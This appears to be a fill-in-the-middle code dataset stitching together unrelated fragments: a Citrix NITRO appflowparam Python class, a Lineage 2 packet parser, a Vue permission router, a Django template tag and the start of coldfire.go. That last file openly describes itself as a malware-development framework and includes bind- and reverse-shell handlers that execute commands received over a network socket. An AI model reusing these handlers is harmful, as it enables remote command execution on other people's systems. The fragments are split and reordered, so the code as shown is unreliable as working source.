r"""Include the http domain request to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpdomain
except Exception as e:
raise e
@httpdomain.setter
def httpdomain(self, httpdomain) :
r"""Include the http domain request to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpdomain = httpdomain
except Exception as e:
raise e
@property
def skipcacheredirectionhttptransaction(self) :
r"""Skip Cache http transaction. This HTTP transaction is specific to Cache Redirection module. In Case of Cache Miss there will be another HTTP transaction initiated by the cache server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._skipcacheredirectionhttptransaction
except Exception as e:
raise e
@skipcacheredirectionhttptransaction.setter
def skipcacheredirectionhttptransaction(self, skipcacheredirectionhttptransaction) :
r"""Skip Cache http transaction. This HTTP transaction is specific to Cache Redirection module. In Case of Cache Miss there will be another HTTP transaction initiated by the cache server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._skipcacheredirectionhttptransaction = skipcacheredirectionhttptransaction
except Exception as e:
raise e
@property
def identifiername(self) :
r"""Include the stream identifier name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._identifiername
except Exception as e:
raise e
@identifiername.setter
def identifiername(self, identifiername) :
r"""Include the stream identifier name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._identifiername = identifiername
except Exception as e:
raise e
@property
def identifiersessionname(self) :
r"""Include the stream identifier session name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._identifiersessionname
except Exception as e:
raise e
@identifiersessionname.setter
def identifiersessionname(self, identifiersessionname) :
r"""Include the stream identifier session name to be exported.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._identifiersessionname = identifiersessionname
except Exception as e:
raise e
@property
def observationdomainid(self) :
r"""An observation domain groups a set of Citrix ADCs based on deployment: cluster, HA etc. A unique Observation Domain ID is required to be assigned to each such group.<br/>Default value: 0<br/>Minimum length = 1000.
"""
try :
return self._observationdomainid
except Exception as e:
raise e
@observationdomainid.setter
def observationdomainid(self, observationdomainid) :
r"""An observation domain groups a set of Citrix ADCs based on deployment: cluster, HA etc. A unique Observation Domain ID is required to be assigned to each such group.<br/>Default value: 0<br/>Minimum length = 1000
"""
try :
self._observationdomainid = observationdomainid
except Exception as e:
raise e
@property
def observationdomainname(self) :
r"""Name of the Observation Domain defined by the observation domain ID.<br/>Maximum length = 127.
"""
try :
return self._observationdomainname
except Exception as e:
raise e
@observationdomainname.setter
def observationdomainname(self, observationdomainname) :
r"""Name of the Observation Domain defined by the observation domain ID.<br/>Maximum length = 127
"""
try :
self._observationdomainname = observationdomainname
except Exception as e:
raise e
@property
def subscriberawareness(self) :
r"""Enable this option for logging end user MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._subscriberawareness
except Exception as e:
raise e
@subscriberawareness.setter
def subscriberawareness(self, subscriberawareness) :
r"""Enable this option for logging end user MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._subscriberawareness = subscriberawareness
except Exception as e:
raise e
@property
def subscriberidobfuscation(self) :
r"""Enable this option for obfuscating MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._subscriberidobfuscation
except Exception as e:
raise e
@subscriberidobfuscation.setter
def subscriberidobfuscation(self, subscriberidobfuscation) :
r"""Enable this option for obfuscating MSISDN in L4/L7 appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._subscriberidobfuscation = subscriberidobfuscation
except Exception as e:
raise e
@property
def subscriberidobfuscationalgo(self) :
r"""Algorithm(MD5 or SHA256) to be used for obfuscating MSISDN.<br/>Default value: MD5<br/>Possible values = MD5, SHA256.
"""
try :
return self._subscriberidobfuscationalgo
except Exception as e:
raise e
@subscriberidobfuscationalgo.setter
def subscriberidobfuscationalgo(self, subscriberidobfuscationalgo) :
r"""Algorithm(MD5 or SHA256) to be used for obfuscating MSISDN.<br/>Default value: MD5<br/>Possible values = MD5, SHA256
"""
try :
self._subscriberidobfuscationalgo = subscriberidobfuscationalgo
except Exception as e:
raise e
@property
def gxsessionreporting(self) :
r"""Enable this option for Gx session reporting.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._gxsessionreporting
except Exception as e:
raise e
@gxsessionreporting.setter
def gxsessionreporting(self, gxsessionreporting) :
r"""Enable this option for Gx session reporting.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._gxsessionreporting = gxsessionreporting
except Exception as e:
raise e
@property
def securityinsighttraffic(self) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._securityinsighttraffic
except Exception as e:
raise e
@securityinsighttraffic.setter
def securityinsighttraffic(self, securityinsighttraffic) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._securityinsighttraffic = securityinsighttraffic
except Exception as e:
raise e
@property
def cacheinsight(self) :
r"""Flag to determine whether cache records need to be exported or not. If this flag is true and IC is enabled, cache records are exported instead of L7 HTTP records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._cacheinsight
except Exception as e:
raise e
@cacheinsight.setter
def cacheinsight(self, cacheinsight) :
r"""Flag to determine whether cache records need to be exported or not. If this flag is true and IC is enabled, cache records are exported instead of L7 HTTP records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._cacheinsight = cacheinsight
except Exception as e:
raise e
@property
def videoinsight(self) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._videoinsight
except Exception as e:
raise e
@videoinsight.setter
def videoinsight(self, videoinsight) :
r"""Enable/disable the feature individually on appflow action.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._videoinsight = videoinsight
except Exception as e:
raise e
@property
def httpquerywithurl(self) :
r"""Include the HTTP query segment along with the URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpquerywithurl
except Exception as e:
raise e
@httpquerywithurl.setter
def httpquerywithurl(self, httpquerywithurl) :
r"""Include the HTTP query segment along with the URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpquerywithurl = httpquerywithurl
except Exception as e:
raise e
@property
def urlcategory(self) :
r"""Include the URL category record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._urlcategory
except Exception as e:
raise e
@urlcategory.setter
def urlcategory(self, urlcategory) :
r"""Include the URL category record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._urlcategory = urlcategory
except Exception as e:
raise e
@property
def lsnlogging(self) :
r"""On enabling this option, the Citrix ADC will send the Large Scale Nat(LSN) records to the configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._lsnlogging
except Exception as e:
raise e
@lsnlogging.setter
def lsnlogging(self, lsnlogging) :
r"""On enabling this option, the Citrix ADC will send the Large Scale Nat(LSN) records to the configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._lsnlogging = lsnlogging
except Exception as e:
raise e
@property
def cqareporting(self) :
r"""TCP CQA reporting enable/disable knob.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._cqareporting
except Exception as e:
raise e
@cqareporting.setter
def cqareporting(self, cqareporting) :
r"""TCP CQA reporting enable/disable knob.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._cqareporting = cqareporting
except Exception as e:
raise e
@property
def emailaddress(self) :
r"""Enable AppFlow user email-id logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._emailaddress
except Exception as e:
raise e
@emailaddress.setter
def emailaddress(self, emailaddress) :
r"""Enable AppFlow user email-id logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._emailaddress = emailaddress
except Exception as e:
raise e
@property
def usagerecordinterval(self) :
r"""On enabling this option, the NGS will send bandwidth usage record to configured collectors.<br/>Default value: 0<br/>Maximum length = 7200.
"""
try :
return self._usagerecordinterval
except Exception as e:
raise e
@usagerecordinterval.setter
def usagerecordinterval(self, usagerecordinterval) :
r"""On enabling this option, the NGS will send bandwidth usage record to configured collectors.<br/>Default value: 0<br/>Maximum length = 7200
"""
try :
self._usagerecordinterval = usagerecordinterval
except Exception as e:
raise e
@property
def websaasappusagereporting(self) :
r"""On enabling this option, NGS will send data used by Web/saas app at the end of every HTTP transaction to configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._websaasappusagereporting
except Exception as e:
raise e
@websaasappusagereporting.setter
def websaasappusagereporting(self, websaasappusagereporting) :
r"""On enabling this option, NGS will send data used by Web/saas app at the end of every HTTP transaction to configured collectors.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._websaasappusagereporting = websaasappusagereporting
except Exception as e:
raise e
@property
def metrics(self) :
r"""Enable Citrix ADC Stats to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._metrics
except Exception as e:
raise e
@metrics.setter
def metrics(self, metrics) :
r"""Enable Citrix ADC Stats to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._metrics = metrics
except Exception as e:
raise e
@property
def events(self) :
r"""Enable Events to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._events
except Exception as e:
raise e
@events.setter
def events(self, events) :
r"""Enable Events to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._events = events
except Exception as e:
raise e
@property
def auditlogs(self) :
r"""Enable Auditlogs to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._auditlogs
except Exception as e:
raise e
@auditlogs.setter
def auditlogs(self, auditlogs) :
r"""Enable Auditlogs to be sent to the Telemetry Agent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._auditlogs = auditlogs
except Exception as e:
raise e
@property
def observationpointid(self) :
r"""An observation point ID is identifier for the NetScaler from which appflow records are being exported. By default, the NetScaler IP is the observation point ID.<br/>Minimum length = 1.
"""
try :
return self._observationpointid
except Exception as e:
raise e
@observationpointid.setter
def observationpointid(self, observationpointid) :
r"""An observation point ID is identifier for the NetScaler from which appflow records are being exported. By default, the NetScaler IP is the observation point ID.<br/>Minimum length = 1
"""
try :
self._observationpointid = observationpointid
except Exception as e:
raise e
@property
def distributedtracing(self) :
r"""Enable generation of the distributed tracing templates in the Appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._distributedtracing
except Exception as e:
raise e
@distributedtracing.setter
def distributedtracing(self, distributedtracing) :
r"""Enable generation of the distributed tracing templates in the Appflow records.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._distributedtracing = distributedtracing
except Exception as e:
raise e
@property
def disttracingsamplingrate(self) :
r"""Sampling rate for Distributed Tracing.<br/>Default value: 0<br/>Maximum length = 100.
"""
try :
return self._disttracingsamplingrate
except Exception as e:
raise e
@disttracingsamplingrate.setter
def disttracingsamplingrate(self, disttracingsamplingrate) :
r"""Sampling rate for Distributed Tracing.<br/>Default value: 0<br/>Maximum length = 100
"""
try :
self._disttracingsamplingrate = disttracingsamplingrate
except Exception as e:
raise e
@property
def tcpattackcounterinterval(self) :
r"""Interval, in seconds, at which to send tcp attack counters to the configured collectors. If 0 is configured, the record is not sent.<br/>Default value: 0<br/>Maximum length = 3600.
"""
try :
return self._tcpattackcounterinterval
except Exception as e:
raise e
@tcpattackcounterinterval.setter
def tcpattackcounterinterval(self, tcpattackcounterinterval) :
r"""Interval, in seconds, at which to send tcp attack counters to the configured collectors. If 0 is configured, the record is not sent.<br/>Default value: 0<br/>Maximum length = 3600
"""
try :
self._tcpattackcounterinterval = tcpattackcounterinterval
except Exception as e:
raise e
@property
def logstreamovernsip(self) :
r"""To use the Citrix ADC IP to send Logstream records instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._logstreamovernsip
except Exception as e:
raise e
@logstreamovernsip.setter
def logstreamovernsip(self, logstreamovernsip) :
r"""To use the Citrix ADC IP to send Logstream records instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._logstreamovernsip = logstreamovernsip
except Exception as e:
raise e
@property
def analyticsauthtoken(self) :
r"""Authentication token to be set by the agent.<br/>Maximum length = 256.
"""
try :
return self._analyticsauthtoken
except Exception as e:
raise e
@analyticsauthtoken.setter
def analyticsauthtoken(self, analyticsauthtoken) :
r"""Authentication token to be set by the agent.<br/>Maximum length = 256
"""
try :
self._analyticsauthtoken = analyticsauthtoken
except Exception as e:
raise e
@property
def timeseriesovernsip(self) :
r"""To use the Citrix ADC IP to send Time series data such as metrics and events, instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._timeseriesovernsip
except Exception as e:
raise e
@timeseriesovernsip.setter
def timeseriesovernsip(self, timeseriesovernsip) :
r"""To use the Citrix ADC IP to send Time series data such as metrics and events, instead of the SNIP.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._timeseriesovernsip = timeseriesovernsip
except Exception as e:
raise e
@property
def builtin(self) :
r"""Flag to determine if the appflow param is built-in or not.<br/>Possible values = MODIFIABLE, DELETABLE, IMMUTABLE, PARTITION_ALL.
"""
try :
return self._builtin
except Exception as e:
raise e
@property
def feature(self) :
r"""The feature to be checked while applying this config.
"""
try :
return self._feature
except Exception as e:
raise e
@property
def tcpburstreporting(self) :
r"""TCP burst reporting enable/disable knob.<br/>Default value: ENABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._tcpburstreporting
except Exception as e:
raise e
@property
def tcpburstreportingthreshold(self) :
r"""TCP burst reporting threshold.<br/>Default value: 1500<br/>Minimum value = 10<br/>Maximum value = 5000.
"""
try :
return self._tcpburstreportingthreshold
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(appflowparam_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.appflowparam
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def filter_update_parameters(cls, resource) :
r""" Use this function to create a resource with only update operation specific parameters.
"""
updateresource = appflowparam()
updateresource.templaterefresh = resource.templaterefresh
updateresource.appnamerefresh = resource.appnamerefresh
updateresource.flowrecordinterval = resource.flowrecordinterval
updateresource.securityinsightrecordinterval = resource.securityinsightrecordinterval
updateresource.udppmtu = resource.udppmtu
updateresource.httpurl = resource.httpurl
updateresource.aaausername = resource.aaausername
updateresource.httpcookie = resource.httpcookie
updateresource.httpreferer = resource.httpreferer
updateresource.httpmethod = resource.httpmethod
updateresource.httphost = resource.httphost
updateresource.httpuseragent = resource.httpuseragent
updateresource.clienttrafficonly = resource.clienttrafficonly
updateresource.httpcontenttype = resource.httpcontenttype
updateresource.httpauthorization = resource.httpauthorization
updateresource.httpvia = resource.httpvia
updateresource.httpxforwardedfor = resource.httpxforwardedfor
updateresource.httplocation = resource.httplocation
updateresource.httpsetcookie = resource.httpsetcookie
updateresource.httpsetcookie2 = resource.httpsetcookie2
updateresource.connectionchaining = resource.connectionchaining
updateresource.httpdomain = resource.httpdomain
updateresource.skipcacheredirectionhttptransaction = resource.skipcacheredirectionhttptransaction
updateresource.identifiername = resource.identifiername
updateresource.identifiersessionname = resource.identifiersessionname
updateresource.observationdomainid = resource.observationdomainid
updateresource.observationdomainname = resource.observationdomainname
updateresource.subscriberawareness = resource.subscriberawareness
updateresource.subscriberidobfuscation = resource.subscriberidobfuscation
updateresource.subscriberidobfuscationalgo = resource.subscriberidobfuscationalgo
updateresource.gxsessionreporting = resource.gxsessionreporting
updateresource.securityinsighttraffic = resource.securityinsighttraffic
updateresource.cacheinsight = resource.cacheinsight
updateresource.videoinsight = resource.videoinsight
updateresource.httpquerywithurl = resource.httpquerywithurl
updateresource.urlcategory = resource.urlcategory
updateresource.lsnlogging = resource.lsnlogging
updateresource.cqareporting = resource.cqareporting
updateresource.emailaddress = resource.emailaddress
updateresource.usagerecordinterval = resource.usagerecordinterval
updateresource.websaasappusagereporting = resource.websaasappusagereporting
updateresource.metrics = resource.metrics
updateresource.events = resource.events
updateresource.auditlogs = resource.auditlogs
updateresource.observationpointid = resource.observationpointid
updateresource.distributedtracing = resource.distributedtracing
updateresource.disttracingsamplingrate = resource.disttracingsamplingrate
updateresource.tcpattackcounterinterval = resource.tcpattackcounterinterval
updateresource.logstreamovernsip = resource.logstreamovernsip
updateresource.analyticsauthtoken = resource.analyticsauthtoken
updateresource.timeseriesovernsip = resource.timeseriesovernsip
return updateresource
@classmethod
def update(cls, client, resource) :
r""" Use this API to update appflowparam.
"""
try :
if type(resource) is not list :
updateresource = cls.filter_update_parameters(resource)
return updateresource.update_resource(client)
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
r""" Use this API to unset the properties of appflowparam resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = appflowparam()
return unsetresource.unset_resource(client, args)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
r""" Use this API to fetch all the appflowparam resources that are configured on netscaler.
"""
try :
if not name :
obj = appflowparam()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class Httpreferer:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Logstreamovernsip:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Websaasappusagereporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Cqareporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Feature:
WL = "WL"
WebLogging = "WebLogging"
SP = "SP"
SurgeProtection = "SurgeProtection"
LB = "LB"
LoadBalancing = "LoadBalancing"
CS = "CS"
ContentSwitching = "ContentSwitching"
CR = "CR"
CacheRedirection = "CacheRedirection"
SC = "SC"
SureConnect = "SureConnect"
CMP = "CMP"
CMPcntl = "CMPcntl"
CompressionControl = "CompressionControl"
PQ = "PQ"
PriorityQueuing = "PriorityQueuing"
HDOSP = "HDOSP"
HttpDoSProtection = "HttpDoSProtection"
SSLVPN = "SSLVPN"
AAA = "AAA"
GSLB = "GSLB"
GlobalServerLoadBalancing = "GlobalServerLoadBalancing"
SSL = "SSL"
SSLOffload = "SSLOffload"
SSLOffloading = "SSLOffloading"
CF = "CF"
ContentFiltering = "ContentFiltering"
IC = "IC"
IntegratedCaching = "IntegratedCaching"
OSPF = "OSPF"
OSPFRouting = "OSPFRouting"
RIP = "RIP"
RIPRouting = "RIPRouting"
BGP = "BGP"
BGPRouting = "BGPRouting"
REWRITE = "REWRITE"
IPv6PT = "IPv6PT"
IPv6protocoltranslation = "IPv6protocoltranslation"
AppFw = "AppFw"
ApplicationFirewall = "ApplicationFirewall"
RESPONDER = "RESPONDER"
HTMLInjection = "HTMLInjection"
push = "push"
NSPush = "NSPush"
NetScalerPush = "NetScalerPush"
AppFlow = "AppFlow"
CloudBridge = "CloudBridge"
ISIS = "ISIS"
ISISRouting = "ISISRouting"
CH = "CH"
CallHome = "CallHome"
AppQoE = "AppQoE"
ContentAccelerator = "ContentAccelerator"
SYSTEM = "SYSTEM"
RISE = "RISE"
FEO = "FEO"
LSN = "LSN"
LargeScaleNAT = "LargeScaleNAT"
RDPProxy = "RDPProxy"
Rep = "Rep"
Reputation = "Reputation"
URLFiltering = "URLFiltering"
VideoOptimization = "VideoOptimization"
ForwardProxy = "ForwardProxy"
SSLInterception = "SSLInterception"
AdaptiveTCP = "AdaptiveTCP"
CQA = "CQA"
CI = "CI"
ContentInspection = "ContentInspection"
Bot = "Bot"
APIGateway = "APIGateway"
class Httpsetcookie:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpvia:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Gxsessionreporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpdomain:
|
class Videoinsight:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpsetcookie2:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Auditlogs:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Builtin:
MODIFIABLE = "MODIFIABLE"
DELETABLE = "DELETABLE"
IMMUTABLE = "IMMUTABLE"
PARTITION_ALL = "PARTITION_ALL"
class Httpquerywithurl:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpauthorization:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Urlcategory:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Skipcacheredirectionhttptransaction:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Aaausername:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Lsnlogging:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Clienttrafficonly:
YES = "YES"
NO = "NO"
class Securityinsighttraffic:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpcontenttype:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Cacheinsight:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Timeseriesovernsip:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Emailaddress:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpmethod:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberawareness:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httplocation:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Distributedtracing:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Identifiersessionname:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Tcpburstreporting:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Metrics:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Connectionchaining:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberidobfuscation:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpxforwardedfor:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Subscriberidobfuscationalgo:
MD5 = "MD5"
SHA256 = "SHA256"
class Identifiername:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpcookie:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpurl:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Events:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httpuseragent:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class Httphost:
ENABLED = "ENABLED"
DISABLED = "DISABLED"
class appflowparam_response(base_response) :
def __init__(self, length=1) :
self.appflowparam = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.appflowparam = [appflowparam() for _ in range(length)]
| ENABLED = "ENABLED"
DISABLED = "DISABLED" |
PartySmallWindowAll.ts | import GameClientPacket from "./GameClientPacket";
import { GlobalEvents } from "../../mmocore/EventEmitter";
import L2Character from "../../entities/L2Character";
import L2PartyMember from "../../entities/L2PartyMember";
export default class PartySmallWindowAll extends GameClientPacket {
// @Override
readImpl(): boolean {
const _id = this.readC();
const _leaderObjectId = this.readD();
const _distributionType = this.readD();
const _memberCount = this.readD();
this.Client.PartyList.clear();
for (let i = 0; i < _memberCount; i++) {
const _objectId = this.readD();
const char = new L2PartyMember();
char.ObjectId = _objectId;
char.Name = this.readS();
char.Cp = this.readD();
char.MaxCp = this.readD();
char.Hp = this.readD();
char.MaxHp = this.readD();
char.Mp = this.readD();
char.MaxMp = this.readD();
char.Level = this.readD();
char.ClassId = this.readD();
const _pad1 = this.readD();
char.Race = this.readD();
const _pad2 = this.readD();
const _pad3 = this.readD();
const _summonObjId = this.readD();
if (_summonObjId > 0) { | const _summonHp = this.readD();
const _summonMaxHp = this.readD();
const _summonMp = this.readD();
const _summonMaxMp = this.readD();
const _summonLevel = this.readD();
}
char.IsPartyLeader = char.ObjectId === _leaderObjectId;
this.Client.PartyList.add(char);
}
return true;
}
// @Override
run(): void {
// no-op
}
} | const _summonId = this.readD();
const _summonType = this.readD();
const _summonName = this.readS(); |
permission.js | import {
asyncRouterMap,
constantRouterMap
} from 'src/router'
import { fetchAll } from 'api/admin/menu/index';
/**
* 通过authority判断是否与当前用户权限匹配
* @param menus
* @param route
*/
function hasPermission(menus, route) {
if (route.authority) {
if (menus[route.authority] !== undefined) {
return menus[route.authority];
} else {
return false;
}
} else {
return true
}
}
/**
* 递归过滤异步路由表,返回符合用户角色权限的路由表
* @param asyncRouterMap
* @param roles
*/
function filterAsyncRouter(asyncRouterMap, menus, menuDatas) {
const accessedRouters | filter(route => {
if (hasPermission(menus, route)) {
route.name = menuDatas[route.authority].title;
route.icon = menuDatas[route.authority].icon;
if (route.children && route.children.length) {
route.children = filterAsyncRouter(route.children, menus, menuDatas);
}
return true
}
return false
})
return accessedRouters
}
const permission = {
state: {
routers: constantRouterMap,
addRouters: []
},
mutations: {
SET_ROUTERS: (state, routers) => {
state.addRouters = routers
state.routers = constantRouterMap.concat(routers)
}
},
actions: {
GenerateRoutes({
commit
}, menus) {
return new Promise(resolve => {
fetchAll().then(data => {
const menuDatas = {};
for (let i = 0; i < data.length; i++) {
menuDatas[data[i].code] = data[i];
}
const accessedRouters = filterAsyncRouter(asyncRouterMap, menus, menuDatas);
commit('SET_ROUTERS', accessedRouters);
resolve();
});
})
}
}
};
export default permission;
| = asyncRouterMap. |
mc2_tags.py | from django import template
from django_gravatar.templatetags.gravatar import gravatar_url
# Get template.Library instance
register = template.Library()
# enables the use of the gravatar_url as an assignment tag
register.assignment_tag(gravatar_url)
@register.simple_tag(takes_context=True)
def display_name(context):
user = context['user']
full_name = ' '.join([user.first_name, user.last_name]).strip()
return full_name if full_name else user.username
@register.filter
def | (value, factor):
try:
return value * factor
except: # noqa
pass # noqa
return 0
| multiply |
coldfire.go | // Package coldfire is a framework that provides functions
// for malware development that are mostly compatible with
// Linux and Windows operating systems.
package coldfire
import (
"archive/zip"
"bufio"
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/md5"
crandom "crypto/rand"
"encoding/base64"
"encoding/binary"
"encoding/hex"
"fmt"
"io"
"io/ioutil"
"log"
"math/rand"
"net"
"net/http"
"os"
"os/exec"
"reflect"
"regexp"
"runtime"
"strconv"
"strings"
"time"
portscanner "github.com/anvie/port-scanner"
"github.com/fatih/color"
"github.com/google/gopacket"
"github.com/google/gopacket/pcap"
"github.com/jackpal/gateway"
"github.com/matishsiao/goInfo"
"github.com/mitchellh/go-homedir"
ps "github.com/mitchellh/go-ps"
"github.com/savaki/jq"
// wapi "github.com/iamacarpet/go-win64api"
// "tawesoft.co.uk/go/dialog"
)
var (
Red = color.New(color.FgRed).SprintFunc()
Green = color.New(color.FgGreen).SprintFunc()
Cyan = color.New(color.FgBlue).SprintFunc()
Bold = color.New(color.Bold).SprintFunc()
Yellow = color.New(color.FgYellow).SprintFunc()
Magenta = color.New(color.FgMagenta).SprintFunc()
)
// Revert returns a reversed string.
func Revert(s string) string {
r := []rune(s)
for i, j := 0, len(r)-1; i < len(r)/2; i, j = i+1, j-1 {
r[i], r[j] = r[j], r[i]
}
return string(r)
}
// IpIncrement increments an IP address by 1.
func IpIncrement(ip net.IP) {
for j := len(ip) - 1; j >= 0; j-- {
ip[j]++
if ip[j] > 0 {
break
}
}
}
// KillProcByPID kills a process given its PID.
func KillProcByPID(pid int) error {
return killProcByPID(pid)
}
func handleBind(conn net.Conn) {
for {
buffer := make([]byte, 1024)
length, _ := conn.Read(buffer)
command := string(buffer[:length-1])
out, _ := CmdOut(command)
// parts := strings.Fields(command)
// head := parts[0]
// parts = parts[1:len(parts)]
// out, _ := exec.Command(head,parts...).Output()
conn.Write([]byte(out))
}
}
func handleReverse(conn net.Conn) {
message, _ := bufio.NewReader(conn).ReadString('\n')
out, err := exec.Command(strings.TrimSuffix(message, "\n")).Output()
if err != nil {
fmt.Fprintf(conn, "%s\n", err)
}
fmt.Fprintf(conn, "%s\n", out)
}
func getNTPTime() time.Time {
type ntp struct {
FirstByte, A, B, C uint8
D, E, F uint32
G, H uint64
ReceiveTime uint64
J uint64
}
sock, _ := net.Dial("udp", "us.pool.ntp.org:123")
sock.SetDeadline(time.Now().Add((2 * time.Second)))
defer sock.Close()
transmit := new(ntp)
transmit.FirstByte = 0x1b
binary.Write(sock, binary.BigEndian, transmit)
binary.Read(sock, binary.BigEndian, transmit)
return time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((transmit.ReceiveTime >> 32) * 1000000000)))
}
